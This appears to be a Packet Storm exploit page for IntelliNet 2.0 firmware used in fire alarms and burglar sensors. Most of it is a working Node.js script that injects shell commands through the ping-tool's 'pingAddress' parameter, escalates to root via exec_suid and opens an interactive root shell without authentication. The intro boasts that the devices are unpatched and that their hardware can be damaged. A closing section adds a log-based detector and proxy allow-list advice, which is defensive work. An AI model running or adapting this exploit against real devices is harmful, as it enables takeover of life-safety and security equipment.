IntelliNet 2.0 Remote Root

Zero-day remote root exploit for IntelliNet version 2.0. It affects multiple devices from AES Corp and Siemens. The exploit provides a remote shell and escalates your permissions to full root permissions by abusing exec_suid. No authentication is needed at all, nor any interaction from the victim. The firmware affected by this exploit runs on fire alarms, burglar sensors and environmental devices, all on the internet, all vulnerable, no patch. It gives full control over hardware and software with no restrictions: you can manipulate battery voltage and even damage the hardware with unknown outcomes.

Packet Storm
#!/usr/local/bin/node
const { execSync } = require('child_process');
const readline = require('readline');

let TARGET = '';
let COMMAND = '';
let SESSION = '';
const ESCALATE = '/usr/aes/bin/exec_suid';

console.log(`
╔════════════════════════════════════════════╗
║ IntelliNet 2.0 Remote Root Exploit (0-Day) ║
║ Author: Jean Pereira <[email protected]>     ║
╚════════════════════════════════════════════╝
`);

const cleanUp = () => {
  execSync(
    `curl -sL "http://${TARGET}/acorn_data_to.php?cmd=ping-tool&pingAddress=127.0.0.1;rm%20.gitignore;"`
  );
};

const createShell = (cmd) => {
  execSync(
    `curl -sL "http://${TARGET}/acorn_data_to.php?cmd=ping-tool&pingAddress=127.0.0.1;${encodeURIComponent(
      [ESCALATE, cmd].join(' ')
    )}%20%3E%20.gitignore;"`
  );
  return execSync(`curl -sL "http://${TARGET}/.gitignore"`).toString().trim();
};

const rl = readline.createInterface({
  input: process.stdin,
  output: process.stdout,
});

const interactiveShell = () => {
  rl.question(`root@${SESSION.slice(8)}:~# `, (currentCommand) => {
    if (currentCommand.trim() === '!q') {
      console.log('Cleaning up...');
      cleanUp();
      rl.close();
    } else {
      COMMAND = currentCommand;
      let output = createShell(COMMAND);
      console.log(output);
      interactiveShell();
    }
  });
};

rl.question('[*] Enter target IP: ', (targetIP) => {
  TARGET = targetIP;
  SESSION = createShell('echo a1b2c3d4$HOSTNAME');
  if (!SESSION.startsWith('a1b2c3d4')) {
    console.log('[*] Could not execute payload, aborting');
    process.exit(0);
  } else {
    console.log('[*] Payload injected to firmware');
    console.log('[*] Launching root shell via exec_suid');
  }
  console.log('');
  interactiveShell();
});

rl.on('close', () => {
  process.exit(0);
});
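
The script above injects through the `pingAddress` parameter of `acorn_data_to.php?cmd=ping-tool` and reads the command output back from `/.gitignore`, so each command leaves a recognizable pair of requests in a web access log. The following detection check is an added example, not part of the original advisory; the combined-log layout, the function names and the sample lines are assumptions constructed for illustration.

```javascript
// Added example (not from the original page): flag ping-tool requests whose
// pingAddress is not a plain IPv4 address or hostname, then correlate them
// with later /.gitignore fetches from the same client.

// Assumed combined-log layout: client - - [time] "METHOD path HTTP/x" status size
const LINE_RE = /^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+) [^"]*" (\d{3})/;
// Dotted labels of letters, digits and inner hyphens; covers IPv4 and hostnames.
const PLAIN_TARGET_RE =
  /^(?=.{1,253}$)[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?(\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)*$/i;

function isPlainPingTarget(value) {
  return PLAIN_TARGET_RE.test(value);
}

function analyze(logLines) {
  const findings = [];
  const suspects = new Set(); // clients that already sent a bad pingAddress
  for (const line of logLines) {
    const m = LINE_RE.exec(line);
    if (!m) continue;
    const [, client, , rawPath] = m;
    let url;
    try { url = new URL(rawPath, 'http://device.invalid'); } catch { continue; }
    if (url.pathname.endsWith('/acorn_data_to.php') &&
        url.searchParams.get('cmd') === 'ping-tool') {
      const addr = url.searchParams.get('pingAddress'); // already percent-decoded
      if (addr !== null && !isPlainPingTarget(addr)) {
        suspects.add(client);
        findings.push({ client, type: 'bad-ping-address', value: addr });
      }
    } else if (url.pathname === '/.gitignore' && suspects.has(client)) {
      findings.push({ client, type: 'output-readback', value: url.pathname });
    }
  }
  return findings;
}

// Constructed sample lines (documentation address ranges), not captured traffic.
const SAMPLE_LOG = [
  '198.51.100.7 - - [01/Jan/2025:10:00:00 +0000] "GET /acorn_data_to.php?cmd=ping-tool&pingAddress=192.0.2.10 HTTP/1.1" 200 120',
  '203.0.113.9 - - [01/Jan/2025:10:01:00 +0000] "GET /acorn_data_to.php?cmd=ping-tool&pingAddress=127.0.0.1;rm%20.gitignore; HTTP/1.1" 200 0',
  '203.0.113.9 - - [01/Jan/2025:10:01:01 +0000] "GET /.gitignore HTTP/1.1" 200 33',
  '198.51.100.7 - - [01/Jan/2025:10:02:00 +0000] "GET /.gitignore HTTP/1.1" 404 0',
];

console.log(analyze(SAMPLE_LOG));
```

The same allow-list on `pingAddress` can be enforced at a reverse proxy in front of the device, which matters here because the advisory states there is no patch.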
